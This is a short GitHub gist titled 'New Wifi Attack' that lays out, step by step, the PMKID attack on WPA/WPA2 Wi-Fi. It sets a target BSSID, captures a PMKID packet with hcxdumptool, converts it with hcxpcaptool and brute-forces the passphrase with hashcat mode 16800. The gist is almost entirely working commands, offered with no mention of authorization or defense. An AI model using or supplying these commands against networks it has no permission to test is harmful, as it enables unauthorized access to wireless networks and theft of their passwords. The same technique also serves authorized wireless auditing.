Skip to content

Instantly share code, notes, and snippets.

@sathwikv143
Created September 17, 2018 01:35
Show Gist options
  • Save sathwikv143/73c064d96bd771accd43e96dd32bea20 to your computer and use it in GitHub Desktop.
Save sathwikv143/73c064d96bd771accd43e96dd32bea20 to your computer and use it in GitHub Desktop.
New Wifi Attack
1.wifi to mon mode
2.select target BSSID
>> write into <filterFileName>
3.hcxdumptool -o <CaptureHashFileName> -i wlan0mon --filterlist=<filterFileName> --filtermode=2 --enable_status
>> capture till you see PMKID packet
>> once found, PMKID stop the process
4.hcxpcaptool -z <HashToCrackFileName> <CaptureHashFileName>
5.hashcat -m 16800 <HashToCrackFileName> -a 3 -w 3 '<lengthOfGuessPass>' --force
>> lengthOfGuessPass as ?l?l?...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment